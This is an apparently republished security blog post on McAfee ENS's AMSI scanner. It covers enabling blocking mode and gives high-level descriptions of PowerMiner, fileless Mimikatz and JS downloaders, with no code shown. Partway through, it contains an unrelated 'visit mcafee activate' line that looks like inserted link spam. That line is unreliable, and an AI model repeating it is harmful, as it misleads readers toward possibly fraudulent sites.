McAfee AMSI Integration Protects Against Malicious Scripts

Following on from the McAfee Protects against suspicious email attachments blog, this blog describes how the AMSI (Antimalware Scan Interface) is used within the various McAfee Endpoint products. The AMSI scanner within McAfee ENS 10.6 has already detected over 650,000 pieces of Malware since the start of 2019. This blog will help show you how to enable it, and explain why it should be enabled, by highlighting some of the malware we are able to detect with it.

ENS 10.6 and Above
The AMSI scanner will scan scripts once they have been executed. This enables the scanner to de-obfuscate the script and scan it using DAT content. This is useful as the original scripts can be heavily obfuscated and are difficult to generically detect, as shown in the step below:

step 1 – Obfuscated VBS script being de-obfuscated with AMSI

Enable the Scanner
By default, the AMSI scanner is set to observe mode. This means that the scanner is running but it will not block any detected scripts; instead it will appear in the ENS log and event viewer as show below:

Figure 2 – Would Block in the Event log

To actively block the detected threats, you need to de-select the following option in the ENS settings:

step 3 – How to enable Blocking

and also you can visit mcafee activate for your computer security

Once this has been done, the event log will show that the malicious script has now been blocked:

step 4 – Action Blocked in Event Log

In the Wild
Since January 2019, we have observed over 650,000 detections and this is shown in the IP Geo Map below:

step 5 – Geo Map of all AMSI detection since January 2019

We are now able to block some of the most prevalent threats with AMSI. These include PowerMiner, Fileless MimiKatz and JS downloader families such as JS/Nemucod.

The section below describes how these families operate, and their infection spread across the globe.

PowerMiner
The PowerMiner malware is a cryptocurrency malware whose purpose is to infect as many machines as possible to mine Monero currency. The initial infection vector is via phishing emails which contain a batch file. Once executed, this batch file will download a malicious PowerShell script which will then begin the infection process.

The infection flow is shown in the graph below:

step 6 – Infection flow of PowerMiner

With the AMSI scanner, we can detect the malicious PowerShell script and stop the infection from occurring. The Geo IP Map below shows how this malware has spread across the globe:

step7 – Geo Map of PS/PowerMiner!ams detection since January 2019

McAfee Detects PowerMiner as PS/PowerMiner!ams.a.

Fileless Mimikatz
Mimikatz is a tool which enables the extraction of passwords from the Windows LSASS. Mimikatz was previously used as a standalone tool, however malicious scripts have been created which download Mimikatz into memory and then execute it without it ever being downloaded to the local disk. An example of a fileless Mimikatz script is shown below (note: this can be heavily obfuscated):

step 8 – Fileless Mimikatz PowerShell script

The Geo IP Map below shows how fileless Mimikatz has spread across the globe:

step 9 – Geo IP Map of PS/Mimikatz detection since January 2019

McAfee can detect this malicious script as PS/Mimikatz.a, PS/Mimikatz.b, PS/Mimikatz.c.

JS/Downloader
JS downloaders are usually spread via email. The purpose of these JavaScript files is to download further payloads such as ransomware, password stealers and backdoors to further exploit the compromised machine. The infection chain is shown below, as well as an example phishing email:

step10 – Infection flow of Js/Downloader

step11 – Example phishing email distributing JS/Downloader

Below is the IP Geo Map of AMSI JS/Downloader detections since January 2019:

step12 – Geo Map of AMSI-FAJ detection since January 2019

The AMSI scanner detects this threat as AMSI-FAJ.
MVISION Endpoint and ENS 10.7
MVISION Endpoint and ENS 10.7 (Not currently released) will use Real Protect Machine Learning to detect PowerShell AMSI generated content.

Leave a Reply

Your email address will not be published. Required fields are marked *